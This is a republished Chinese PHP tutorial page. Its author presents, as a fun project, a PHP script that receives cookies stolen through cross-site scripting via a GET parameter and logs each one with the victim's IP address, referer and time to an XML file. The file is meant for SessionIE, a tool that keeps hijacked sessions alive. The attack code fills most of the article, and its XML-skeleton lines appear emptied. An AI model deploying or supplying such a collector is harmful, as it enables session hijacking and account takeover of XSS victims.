Community Learn Tools Library Leisure
search
English
Home > php教程 > php手册 > 配合XSS工具SessionIE的php脚本

配合XSS工具SessionIE的php脚本

WBOY
Release: 2016-06-13 10:22:07
Original
1207 people have browsed it

我写的这个纯粹是好玩,没啥意思,说到底就是操作xml而已。缘起还是归结于前几天http://www.cncert.net在 我们的邮件列表发布了一个新的xss利用工具,类似老外的hamster,在客户端定时刷新保持session不超时。被跨站的人只要访问一次之后,攻击 者就可以一直保持登陆的状态。他这个工具用.net做的,为了方便,要求收集cookie的脚本把cookie保存为xml文件。他提供了一个asp程 序,我只有php空间,因此写了个php的作测试用。
代码:

date_default_timezone_set("Asia/Chongqing");

$my_file = "cookie.xml";

if( ! isset( $_GET[x] ) )
{
     exit;
}

$my_cookie = $_GET[x];
if( $_GET[x] != "" )
{
     if( ! file_exists( $my_file ) )
     {
         CreateXmlFile( );
     }
    
     AddData( $my_cookie );
}

function CreateXmlFile( )
{
     global $my_file;
    
     $fp = fopen( $my_file, "wb" );
     if( ! $fp )
     {
         exit;
     }
    
     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, " " );
     fwrite( $fp, "" );
    
     fclose( $fp );
}

function AddData( $my_cookie )
{
     global $my_file;
    
     $doc = new DOMDocument( );
     $doc->load( $my_file );
     $doc->formatOutput = true;
    
     $treeroot = $doc->getElementsBytagName( "treeroot" )->item(0);
    
     $item = $doc->createElement( "item" );
     $treeroot->appendChild( $item );
    
     if( isset( $_SERVER["REMOTE_HOST"] ) )
     {
         $remote_host = $_SERVER["REMOTE_HOST"];
     }
     elseif( isset( $_SERVER["REMOTE_ADDR"] ) )
     {
         $remote_host = $_SERVER["REMOTE_ADDR"];
     }
     else
     {
         $remote_host = "NotCare";
     }
     $title = $doc->createElement( "title", $remote_host );
     $item->appendChild( $title );
    
     if( isset( $_SERVER["HTTP_REFERER"] ) )
     {
         $refer = $_SERVER["HTTP_REFERER"];
     }
     else
     {
         $refer = "http://yahoo.cn";
     }
     $link = $doc->createElement( "link", $refer );
     $item->appendChild( $link );
    
     $src_ip = $doc->createElement( "src_ip", $_SERVER["REMOTE_ADDR"] );
     $item->appendChild( $src_ip );
    
     $src_os = $doc->createElement( "src_os", "NotCare" );
     $item->appendChild( $src_os );
    
     $pubDate = $doc->createElement( "pubDate", date( "r" ) );
     $item->appendChild( $pubDate );
    
     $description = $doc->createElement( "description", $my_cookie );
     $item->appendChild( $description );
    
     $doc->save( $my_file );
}

?>

Related labels:
php xss fun tool mean I operate yes of Script this Cooperate
source:php.cn
Previous article:关于session的几个补充函数(三) Next article:用MySQL内建复制来最佳化可用性(七)
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
Regular expression to match words I have a script where I am trying to match new job names with existing job names in a data...
From 2024-04-06 21:24:04
0
1
606
Calculate the sum of fields in another table using MySQL SQL query I have a schema like this: User table with attributes "user_id" and "userna...
From 2024-04-06 19:39:29
0
1
441
What are the best practices for displaying version information in web applications? I'm developing a web application. What are the best practices for displaying version infor...
From 2024-04-06 19:13:16
0
2
476
Get the total return value of the input field method I'm trying to find the total value entered by the user. Get an aggregate that multiplies a...
From 2024-04-06 18:19:37
0
1
380
Laravel 8 - How to redirect /{editable_text} route to /{user} route I've been trying to create a redirect route to lead me to a user profile. The redirect rou...
From 2024-04-06 17:26:11
0
1
410
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template